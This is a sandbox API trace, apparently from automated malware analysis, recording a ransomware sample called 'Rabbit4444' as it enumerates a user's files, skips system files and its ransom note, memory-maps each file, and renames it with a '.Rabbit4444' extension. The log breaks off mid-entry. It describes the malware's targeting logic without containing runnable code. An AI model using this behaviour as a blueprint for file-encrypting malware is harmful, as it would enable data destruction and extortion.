[0054.755] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d1c563b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3d1c563b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x3d1c563b, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDBres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0054.755] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.755] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.755] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="Rabbit4444.exe") returned -1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2=".") returned 1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="..") returned 1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="windows") returned -1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="bootmgr") returned 1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="pagefile.sys") returned -1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="boot") returned 1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="ids.txt") returned -1 [0054.756] lstrcmpiW (lpString1="EDBres00001.jrs", lpString2="NTUSER.DAT") returned -1 [0054.756] lstrcpyW (in: lpString1=0x130eba2, lpString2="EDBres00001.jrs" | out: lpString1="EDBres00001.jrs") returned="EDBres00001.jrs" [0054.756] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00001.jrs", dwFileAttributes=0x0) returned 1 [0054.756] lstrlenW (lpString="EDBres00001.jrs") returned 15 [0054.756] lstrlenW (lpString="Rabbit4444") returned 10 [0054.756] lstrcmpiW (lpString1="s00001.jrs", lpString2="Rabbit4444") returned 1 [0054.756] lstrlenW (lpString=".dll") returned 4 [0054.756] lstrcmpiW (lpString1=".jrs", lpString2=".dll") returned 1 [0054.756] lstrlenW (lpString=".lnk") returned 4 [0054.756] lstrcmpiW (lpString1=".jrs", lpString2=".lnk") returned -1 [0054.756] lstrlenW (lpString=".ini") returned 4 [0054.756] lstrcmpiW (lpString1=".jrs", lpString2=".ini") returned 1 [0054.756] lstrlenW (lpString=".sys") returned 4 [0054.756] lstrcmpiW (lpString1=".jrs", lpString2=".sys") returned -1 [0054.756] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00001.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbres00001.jrs"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.772] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.773] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14608340228) returned 1 [0054.773] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2097152) returned 1 [0054.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0054.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0054.773] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x298 [0054.774] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x70000 [0054.774] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0054.851] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0054.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0054.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0054.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0054.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0054.871] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14618159717) returned 1 [0054.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0054.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0054.871] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.977] CloseHandle (hObject=0x298) returned 1 [0054.977] CloseHandle (hObject=0x278) returned 1 [0054.978] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00001.jrs.Rabbit4444") returned 79 [0054.978] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00001.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbres00001.jrs"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00001.jrs.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbres00001.jrs.rabbit4444"), dwFlags=0x1) returned 1 [0054.978] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d1eb87d, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3d1eb87d, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x3d1eb87d, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDBres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0054.978] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.978] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.978] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="Rabbit4444.exe") returned -1 [0054.978] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2=".") returned 1 [0054.979] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="..") returned 1 [0054.979] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="windows") returned -1 [0054.979] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="bootmgr") returned 1 [0054.979] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="pagefile.sys") returned -1 [0054.979] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="boot") returned 1 [0054.979] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="ids.txt") returned -1 [0054.979] lstrcmpiW (lpString1="EDBres00002.jrs", lpString2="NTUSER.DAT") returned -1 [0054.979] lstrcpyW (in: lpString1=0x130eba2, lpString2="EDBres00002.jrs" | out: lpString1="EDBres00002.jrs") returned="EDBres00002.jrs" [0054.979] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00002.jrs", dwFileAttributes=0x0) returned 1 [0054.979] lstrlenW (lpString="EDBres00002.jrs") returned 15 [0054.979] lstrlenW (lpString="Rabbit4444") returned 10 [0054.979] lstrcmpiW (lpString1="s00002.jrs", lpString2="Rabbit4444") returned 1 [0054.979] lstrlenW (lpString=".dll") returned 4 [0054.979] lstrcmpiW (lpString1=".jrs", lpString2=".dll") returned 1 [0054.979] lstrlenW (lpString=".lnk") returned 4 [0054.979] lstrcmpiW (lpString1=".jrs", lpString2=".lnk") returned -1 [0054.979] lstrlenW (lpString=".ini") returned 4 [0054.979] lstrcmpiW (lpString1=".jrs", lpString2=".ini") returned 1 [0054.979] lstrlenW (lpString=".sys") returned 4 [0054.979] lstrcmpiW (lpString1=".jrs", lpString2=".sys") returned -1 [0054.979] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00002.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbres00002.jrs"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.980] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.980] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14629031376) returned 1 [0054.980] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2097152) returned 1 [0054.980] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0054.980] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0054.980] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x298 [0054.981] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x70000 [0054.981] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0055.283] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0055.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0055.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0055.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0055.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0055.384] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14669481425) returned 1 [0055.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0055.384] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0055.384] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.384] CloseHandle (hObject=0x298) returned 1 [0055.384] CloseHandle (hObject=0x278) returned 1 [0055.385] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00002.jrs.Rabbit4444") returned 79 [0055.385] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00002.jrs" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbres00002.jrs"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBres00002.jrs.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbres00002.jrs.rabbit4444"), dwFlags=0x1) returned 1 [0055.386] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3cdbf8a7, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xe1018d51, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EDBtmp.log", cAlternateFileName="")) returned 1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="Rabbit4444.exe") returned -1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2=".") returned 1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="..") returned 1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="windows") returned -1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="bootmgr") returned 1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="pagefile.sys") returned -1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="boot") returned 1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="ids.txt") returned -1 [0055.386] lstrcmpiW (lpString1="EDBtmp.log", lpString2="NTUSER.DAT") returned -1 [0055.386] lstrcpyW (in: lpString1=0x130eba2, lpString2="EDBtmp.log" | out: lpString1="EDBtmp.log") returned="EDBtmp.log" [0055.386] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log", dwFileAttributes=0x0) returned 1 [0055.387] lstrlenW (lpString="EDBtmp.log") returned 10 [0055.387] lstrlenW (lpString="Rabbit4444") returned 10 [0055.387] lstrcmpiW (lpString1="EDBtmp.log", lpString2="Rabbit4444") returned -1 [0055.387] lstrlenW (lpString=".dll") returned 4 [0055.387] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0055.387] lstrlenW (lpString=".lnk") returned 4 [0055.387] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0055.387] lstrlenW (lpString=".ini") returned 4 [0055.387] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0055.387] lstrlenW (lpString=".sys") returned 4 [0055.387] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0055.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbtmp.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.387] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0055.387] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14669792895) returned 1 [0055.387] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2097152) returned 1 [0055.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0055.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0055.387] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x298 [0055.391] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x70000 [0055.391] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0055.505] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0055.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0055.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0055.523] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0055.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0055.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0055.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0055.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0055.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0055.524] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14683447319) returned 1 [0055.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0055.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0055.524] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0055.524] CloseHandle (hObject=0x298) returned 1 [0055.524] CloseHandle (hObject=0x278) returned 1 [0055.524] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log.Rabbit4444") returned 74 [0055.524] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbtmp.log"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\edbtmp.log.rabbit4444"), dwFlags=0x1) returned 1 [0055.525] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d532a92, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3d532a92, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xa95739c, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x110000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vedatamodel.edb", cAlternateFileName="VEDATA~1.EDB")) returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="Rabbit4444.exe") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2=".") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="..") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="windows") returned -1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="bootmgr") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="pagefile.sys") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="boot") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="ids.txt") returned 1 [0055.525] lstrcmpiW (lpString1="vedatamodel.edb", lpString2="NTUSER.DAT") returned 1 [0055.525] lstrcpyW (in: lpString1=0x130eba2, lpString2="vedatamodel.edb" | out: lpString1="vedatamodel.edb") returned="vedatamodel.edb" [0055.525] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb", dwFileAttributes=0x0) returned 1 [0055.526] lstrlenW (lpString="vedatamodel.edb") returned 15 [0055.526] lstrlenW (lpString="Rabbit4444") returned 10 [0055.526] lstrcmpiW (lpString1="amodel.edb", lpString2="Rabbit4444") returned -1 [0055.526] lstrlenW (lpString=".dll") returned 4 [0055.526] lstrcmpiW (lpString1=".edb", lpString2=".dll") returned 1 [0055.526] lstrlenW (lpString=".lnk") returned 4 [0055.526] lstrcmpiW (lpString1=".edb", lpString2=".lnk") returned -1 [0055.526] lstrlenW (lpString=".ini") returned 4 [0055.526] lstrcmpiW (lpString1=".edb", lpString2=".ini") returned -1 [0055.526] lstrlenW (lpString=".sys") returned 4 [0055.526] lstrcmpiW (lpString1=".edb", lpString2=".sys") returned -1 [0055.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0055.526] GetLastError () returned 0x20 [0055.526] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb _CreateFile error 32\r\n") returned 99 [0055.526] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb _CreateFile error 32\r\n") returned 99 [0055.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.526] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb0a [0055.526] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x63, lpOverlapped=0x0) returned 1 [0055.528] CloseHandle (hObject=0x278) returned 1 [0055.529] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0055.529] CloseHandle (hObject=0x0) returned 0 [0055.529] CloseHandle (hObject=0xffffffff) returned 1 [0055.529] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc21df919, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc21df919, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x8c7bc13, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vedatamodel.jfm", cAlternateFileName="VEDATA~1.JFM")) returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="Rabbit4444.exe") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2=".") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="..") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="windows") returned -1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="bootmgr") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="pagefile.sys") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="boot") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="ids.txt") returned 1 [0055.529] lstrcmpiW (lpString1="vedatamodel.jfm", lpString2="NTUSER.DAT") returned 1 [0055.529] lstrcpyW (in: lpString1=0x130eba2, lpString2="vedatamodel.jfm" | out: lpString1="vedatamodel.jfm") returned="vedatamodel.jfm" [0055.529] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.jfm", dwFileAttributes=0x0) returned 1 [0055.530] lstrlenW (lpString="vedatamodel.jfm") returned 15 [0055.530] lstrlenW (lpString="Rabbit4444") returned 10 [0055.530] lstrcmpiW (lpString1="amodel.jfm", lpString2="Rabbit4444") returned -1 [0055.530] lstrlenW (lpString=".dll") returned 4 [0055.530] lstrcmpiW (lpString1=".jfm", lpString2=".dll") returned 1 [0055.530] lstrlenW (lpString=".lnk") returned 4 [0055.530] lstrcmpiW (lpString1=".jfm", lpString2=".lnk") returned -1 [0055.530] lstrlenW (lpString=".ini") returned 4 [0055.530] lstrcmpiW (lpString1=".jfm", lpString2=".ini") returned 1 [0055.530] lstrlenW (lpString=".sys") returned 4 [0055.530] lstrcmpiW (lpString1=".jfm", lpString2=".sys") returned -1 [0055.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.jfm" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\tiledatalayer\\database\\vedatamodel.jfm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0055.530] GetLastError () returned 0x20 [0055.530] wsprintfA (in: param_1=0x130d2c8, param_2="[ERROR] %S _CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.jfm _CreateFile error 32\r\n") returned 99 [0055.530] lstrlenA (lpString="[ERROR] C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.jfm _CreateFile error 32\r\n") returned 99 [0055.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0055.530] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb6d [0055.530] WriteFile (in: hFile=0x278, lpBuffer=0x130d2c8*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x130bf8c, lpOverlapped=0x0 | out: lpBuffer=0x130d2c8*, lpNumberOfBytesWritten=0x130bf8c*=0x63, lpOverlapped=0x0) returned 1 [0055.532] CloseHandle (hObject=0x278) returned 1 [0055.532] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0055.532] CloseHandle (hObject=0x0) returned 0 [0055.532] CloseHandle (hObject=0xffffffff) returned 1 [0055.532] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: 